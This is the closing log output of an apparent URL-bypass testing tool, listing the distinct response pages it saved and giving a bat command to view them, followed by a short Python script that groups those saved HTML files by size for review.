2022-05-10 15:54:09 work bup[738125] WARNING Stage: save_and_quit
2022-05-10 15:54:10 work bup[738125] INFO Saving html pages and short output in: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:10 work bup[738125] INFO Triaged results shows the following distinct pages:
9: 41 - 850a2bd214c68f582aaac1c84c702b5d.html
10: 97 - 219145da181c48fea603aab3097d8201.html
10: 99 - 309b8397d07f618ec07541c418979a84.html
10: 100 - 9a1304f66bfee2130b34258635d50171.html
10: 108 - b61052875693afa4b86d39321d4170b4.html
10: 109 - 6fb5c59f5c29d23e407d6f041523a2bb.html
11: 101 - 045d36e3cfba7f6cbb7e657fc6cf1125.html
12:43116 - 9787a734c56b37f7bf5d78aaee43c55d.html
16: 41 - c5663aedf1036c950a5d83bd83c8e4e7.html
21: 156 - 7857d3d4a9bc8bf69278bf43c4918909.html
22: 107 - 011ca570bdf2e5babcf4f99c4cd84126.html
22: 109 - 6d4b61258386f744a388d402a5f11d03.html
22: 110 - 2f26cd3ba49e023dbda4453e5fd89431.html
76: 821 - bfe5f92861f949e44b355ee22574194a.html
2022-05-10 15:54:10 work bup[738125] INFO Also, inspect them manually with batcat:
echo /tmp/tmp48drf_ie-bypass-url-parser/{850a2bd214c68f582aaac1c84c702b5d.html,219145da181c48fea603aab3097d8201.html,309b8397d07f618ec07541c418979a84.html,9a1304f66bfee2130b34258635d50171.html,b61052875693afa4b86d39321d4170b4.html,6fb5c59f5c29d23e407d6f041523a2bb.html,045d36e3cfba7f6cbb7e657fc6cf1125.html,9787a734c56b37f7bf5d78aaee43c55d.html,c5663aedf1036c950a5d83bd83c8e4e7.html,7857d3d4a9bc8bf69278bf43c4918909.html,011ca570bdf2e5babcf4f99c4cd84126.html,6d4b61258386f744a388d402a5f11d03.html,2f26cd3ba49e023dbda4453e5fd89431.html,bfe5f92861f949e44b355ee22574194a.html} | xargs bat
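The triage step above exists so that only distinct responses need manual review. The same grouping idea can be reproduced in a few lines, assuming a directory of saved .html pages and using the byte size as a cheap similarity proxy:
```python
import os
from collections import defaultdict

OUTDIR = "/tmp/tmp48drf_ie-bypass-url-parser"  # output folder from the run above

# Bucket saved pages by size; identical responses collapse into one bucket
groups = defaultdict(list)
for name in os.listdir(OUTDIR):
    if name.endswith(".html"):
        size = os.path.getsize(os.path.join(OUTDIR, name))
        groups[size].append(name)

# Inspecting one representative per bucket is usually enough
for size, names in sorted(groups.items()):
    print(f"{len(names):>3} page(s) of {size} bytes - e.g. {names[0]}")
```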